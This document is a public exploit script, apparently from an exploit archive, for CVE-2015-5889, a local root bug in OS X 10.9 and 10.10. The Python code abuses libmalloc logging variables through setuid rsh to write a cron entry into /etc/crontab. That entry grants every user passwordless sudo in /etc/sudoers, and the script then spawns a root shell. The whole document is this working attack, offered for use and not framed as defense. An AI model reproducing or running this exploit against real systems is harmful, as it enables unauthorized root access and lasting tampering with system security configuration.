issetugid() + rsh + libmalloc OS X Local Root

`# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root  
# tested on osx 10.9.5 / 10.10.5  
# jul/2015  
# by rebel  
  
import os,time,sys  
  
env = {}  
  
s = os.stat("/etc/sudoers").st_size  
  
env['MallocLogFile'] = '/etc/crontab'  
env['MallocStackLogging'] = 'yes'  
env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'  
  
sys.stderr.write("creating /etc/crontab..")  
  
p = os.fork()  
if p == 0:   
os.close(1)  
os.close(2)  
os.execve("/usr/bin/rsh",["rsh","localhost"],env)  
  
time.sleep(1)  
  
if "NOPASSWD" not in open("/etc/crontab").read():  
sys.stderr.write("failed\n")  
sys.exit(-1)  
  
sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")  
  
while os.stat("/etc/sudoers").st_size == s:  
sys.stderr.write(".")   
time.sleep(1)  
  
sys.stderr.write("\ndone\n")  
  
os.system("sudo su")  
`